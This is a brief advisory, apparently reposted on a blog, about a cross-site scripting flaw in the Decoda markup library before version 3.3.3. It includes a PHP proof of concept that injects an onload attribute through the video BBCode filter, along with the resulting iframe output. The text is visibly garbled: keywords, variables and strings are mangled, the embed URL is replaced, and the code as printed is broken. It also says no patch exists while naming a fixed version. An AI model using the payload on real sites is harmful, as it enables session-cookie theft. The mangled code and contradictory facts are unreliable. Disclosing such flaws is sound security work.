Decoda Cross-Site Scripting Vulnerability

A cross-site scripting vulnerability exists in Decoda versions earlier than 3.3.3. This vulnerability is caused by improper filtering of user input.
 
Attackers can exploit this vulnerability to execute arbitrary script code on the uninformed user browser of the affected site context, steal the cookie-based authentication certificate, and then initiate other attacks.
 
Currently, the vendor has not provided any patches or upgrade programs for this vulnerability. We recommend that users who use this software keep an eye on the vendor's homepage to obtain the latest version.
 
The following proof-of-concept attacks are available:
 
<? Php
Include '../decoda/Decoda. php ';
$ Code = new Decoda ();
$ Code-> addFilter (new VideoFilter ();?>
<? Php
 
$ Decoda_markup = '[video = "youtube" size = "small"] "';
$ Decoda_markup. = 'onload = "alert (\ 'redteam Pentesting XSS \ ');" id = "[/video]';
 
$ Code-> reset ($ decoda_markup );
Echo $ code-> parse ();
?>
 
This results in the following output (whitespace adjusted ):
 
<Iframe src = "http: // www.2cto.com/embed/"; onload = "alert ('redteam'
Pentesting XSS '); "id =" "width =" 560 "height =" 315"
Frameborder = "0"> </iframe>


From 90's Blog